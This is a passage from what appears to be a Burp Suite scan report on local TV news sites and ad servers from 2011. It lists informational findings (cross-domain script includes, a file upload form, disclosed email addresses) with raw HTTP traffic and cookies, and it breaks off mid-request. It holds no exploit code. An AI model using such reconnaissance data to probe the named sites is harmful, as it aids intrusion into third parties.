<META http-equiv="Content-Type" content="text/html">
<title>You Can Qu
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
<span style="white-space:nowrap;"><script src="http://ads.adbrite.com/mb/text_group.php?sid=640921&zs=3436385f3630" type="text/javascript"></script>
...[SNIP]...
<!--END WNStoryUtils-->
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4bbcc485014c0ab2"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
11.66. http://www.wcax.com/Global/story.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/story.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Global/story.asp?S=14408244 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352451310:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS12
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: MEMORY
Content-Type: text/html; charset=utf-8
ntCoent-Length: 35416
Cache-Control: private, max-age=290
Expires: Sat, 09 Apr 2011 12:39:12 GMT
Date: Sat, 09 Apr 2011 12:34:22 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 35416

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Police: RI
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
<!--END WNStoryUtils-->
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4bbcc485014c0ab2"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://content.worldnow.com/global/interface/drag_drop.js?ver=201011111600"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://js-kit.com/comments.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
11.67. http://www.wcax.com/build.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /build.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /build.asp?buildtype=buildpagexmlrequest&featureType=S&featureid=503137&affiliateno=183&clientgroupid=1&rnd=152692 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/global/video/flash/widgets/WNGallery.swf?ver=201010090400
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352546556:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: iis51
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/xml; charset=utf-8
ntCoent-Length: 258153
Cache-Control: private, max-age=300
Date: Sat, 09 Apr 2011 12:35:53 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 258153

<?xml version="1.0" encoding="utf-8"?><DEFAULT><CURRENT><TYPE>S</TYPE><ID>503137</ID><STATUS>L</STATUS><owner><affiliateno>183</affiliateno><affiliatename>WCAX</affiliatename><baseurl>www.wcax.com</ba
...[SNIP]...
<span style="white-space:nowrap;"><script src="http://ads.adbrite.com/mb/text_group.php?sid=640921&zs=3436385f3630" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script language='JavaScript' src='http://www.google.com/afsonline/show_afs_ads.js'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://content.worldnow.com/global/interface/google/googleads.js?ver=200901240400'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://content.worldnow.com/global/interface/google/googlecsearch.js'></script>
...[SNIP]...
</script><script language="JavaScript" src="http://www.google.com/afsonline/show_afs_ads.js"></script>
...[SNIP]...
</script>
               <script type='text/javascript' src='http://content.worldnow.com/global/interface/httprequest/httprequest.js?ver=200711031508'></script><script type='text/javascript' src='http://content.worldnow.com/global/interface/google/googleads.js?ver=200711031508'></script>
...[SNIP]...
</script>
               <script type='text/javascript' src='http://content.worldnow.com/global/interface/httprequest/httprequest.js?ver=200711031508'></script><script type='text/javascript' src='http://content.worldnow.com/global/interface/google/googleads.js?ver=200711031508'></script>
...[SNIP]...
</script><script language='JavaScript' src='http://www.google.com/afsonline/show_afs_ads.js'></script>
...[SNIP]...
11.68. http://www.wptz.com/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wptz.com
Path:   /index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.html HTTP/1.1
Host: www.wptz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
X-IBS-CCDS-VERSION: 2.16.16
Vary: Accept-Encoding
X-IBS-CCDS-ORIGIN: origin126
X-Flow: xslt-in-production
Cache-Control: max-age=324
Expires: Sat, 09 Apr 2011 12:35:07 GMT
Date: Sat, 09 Apr 2011 12:29:43 GMT
Connection: close
Content-Length: 154822

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="fb:page_id" content="213320140463"><script type="text/javascript" src="http://nexus.ensighten.com/IB/Bootstrap.js"></script>
...[SNIP]...
<div class="mediawindow" id="mw21116399"><script type="text/javascript" language="JavaScript" src="http://images.ibsys.com/sh/scripts/generateObject.js"></script>
...[SNIP]...
<div class="sectionwidget2">


<script src="http://nmp.newsgator.com/NGBuzz/buzz.ashx?buzzId=216931&apiToken=291A707AAEE04CCC9A00B3B498001025" type="text/javascript"></script>
...[SNIP]...
<!-- Begin: 4q.iperceptions.com --><script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=6bcb35f8-6319-881d5014-18a0-4b91-acf7-862af4510669&lID=1&loc=4q-web1" type="text/javascript" defer></script>
...[SNIP]...
</SCRIPT><SCRIPT SRC="http://an.tacoda.net/an/13750/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
11.69. http://www.wptz.com/news/27483035/detail.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wptz.com
Path:   /news/27483035/detail.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/27483035/detail.html HTTP/1.1
Host: www.wptz.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400; __utmz=174914276.1302352179.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2064108896-1302352190176; __utmv=; __utma=174914276.1441694128.1302352179.1302352179.1302352179.1; __utmc=174914276; __utmb=174914276.8.10.1302352179; AxData=; Axxd=1; _chartbeat2=2j1fe3rlajhbg39j

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
X-IBS-CCDS-VERSION: 2.16.16
Vary: Accept-Encoding
X-IBS-CCDS-ORIGIN: origin122
X-Flow: xslt-in-production
Cache-Control: max-age=255
Expires: Sat, 09 Apr 2011 12:34:54 GMT
Date: Sat, 09 Apr 2011 12:30:39 GMT
Connection: close
Content-Length: 71577

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
</script><script type="text/javascript" src="http://nexus.ensighten.com/IB/Bootstrap.js"></script>
...[SNIP]...
<div class="taboolaRecommendations"><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/hearst-wptz/rbox.js?article=27483035"></script>
...[SNIP]...
<!-- Begin: 4q.iperceptions.com --><script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=6bcb35f8-6319-881d5014-18a0-4b91-acf7-862af4510669&lID=1&loc=4q-web1" type="text/javascript" defer></script>
...[SNIP]...
</div>


<script type="text/javascript" language="Javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>
...[SNIP]...
</SCRIPT><SCRIPT SRC="http://an.tacoda.net/an/13750/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<!--Load Scripts--><script src="http://clientapps.kickapps.com/hearst/comments/include.php?as=62976">.</script>
...[SNIP]...
</script><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US">.</script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/250/addthis_widget.js#username=hearsttv">.</script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
11.70. http://www.wptz.com/news/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wptz.com
Path:   /news/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/index.html HTTP/1.1
Host: www.wptz.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400; __utmz=174914276.1302352179.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=174914276.1441694128.1302352179.1302352179.1302352179.1; __utmc=174914276; __utmb=174914276.4.10.1302352179; AxData=; Axxd=1; __qca=P0-2064108896-1302352190176

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
X-IBS-CCDS-VERSION: 2.16.16
Vary: Accept-Encoding
X-IBS-CCDS-ORIGIN: origin132
X-Flow: xslt-in-production
Cache-Control: max-age=373
Expires: Sat, 09 Apr 2011 12:36:09 GMT
Date: Sat, 09 Apr 2011 12:29:56 GMT
Connection: close
Content-Length: 89393

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
</script><script type="text/javascript" src="http://nexus.ensighten.com/IB/Bootstrap.js"></script>
...[SNIP]...
<!-- Begin: 4q.iperceptions.com --><script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=6bcb35f8-6319-881d5014-18a0-4b91-acf7-862af4510669&lID=1&loc=4q-web1" type="text/javascript" defer></script>
...[SNIP]...
</SCRIPT><SCRIPT SRC="http://an.tacoda.net/an/13750/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
11.71. http://y.cdn.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://y.cdn.adblade.com
Path:   /imps.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html, HTTP/1.1
Host: y.cdn.adblade.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAzczMzMzM5D.NzMzMzMzkPwAAAAAAAAAAAACAwd-20z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABqMpwLvyHsCa7x.O.NrHwpEVGlz2pya-BtpgD9AAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,Z%3D300x250%26s%3D1209091%26_salt%3D2946263302%26B%3D10%26r%3D0,e860ecda-6462-11e0-9f69-003048d6d894
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-type: text/html
Date: Mon, 11 Apr 2011 17:41:19 GMT
Expires: Mon, 11 Apr 2011 17:41:19 GMT
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Pragma: no-cache
Server: lighttpd/1.4.18
Set-Cookie: __tuid=2298699369328420558; expires=Sat, 09-Apr-2016 17:41:19 GMT; path=/; domain=.adblade.com
Set-Cookie: __impt=1302543679.804242756343; expires=Tue, 12-Apr-2011 17:41:19 GMT; path=/
X-Powered-By: PHP/5.2.8
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-Length: 14514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- End Quantcast tag -->
<script type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=140&pubId=5079&campId=3993"></script>
...[SNIP]...
12. File upload functionality  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.js-kit.com
Path:   /scripts/comments.js

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET /scripts/comments.js HTTP/1.1
Host: cdn.js-kit.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408244
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=259200
Content-Type: application/javascript
Age: 101183
Date: Sat, 09 Apr 2011 12:34:24 GMT
Last-Modified: Fri, 08 Apr 2011 08:24:24 GMT
Expires: Mon, 11 Apr 2011 08:32:06 GMT
Connection: keep-alive
Content-Length: 474074


...[SNIP]...
<form class="js-kit-avatars-upload-form" method="POST" enctype="multipart/form-data" action="' + this.uriAvatar + 'add">' +
       '<input type="file" name="image" class="js-kit-avatars-upload-control" />' +
   '</form>
...[SNIP]...
13. Email addresses disclosed  previous  next
There are 46 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

13.1. http://ads.adbrite.com/adserver/vdi/682865  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno"; vsd=0@4@4da052a6@www.wcax.com; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Sat, 09 Apr 2011 12:36:15 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMDQ2eDAuNzQzIDEzMDE3ODY2MDV4LTExODAzODE1MDI
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@5@4da052bf@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:36:15 GMT
Set-Cookie: rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:15 GMT
Content-Length: 0

13.2. http://ads.adbrite.com/adserver/vdi/682865  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Sat, 09 Apr 2011 12:35:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMDQ2eDAuNzQzIDEzMDE3ODY2MDV4LTExODAzODE1MDI
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052ad@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:57 GMT
Set-Cookie: rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:35:57 GMT
Content-Length: 0

13.3. http://ads.adbrite.com/adserver/vdi/684339  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/684339?d=uuid%3D4d97b063-cd55-fcc9-f79b-3dc3c331fd5b HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
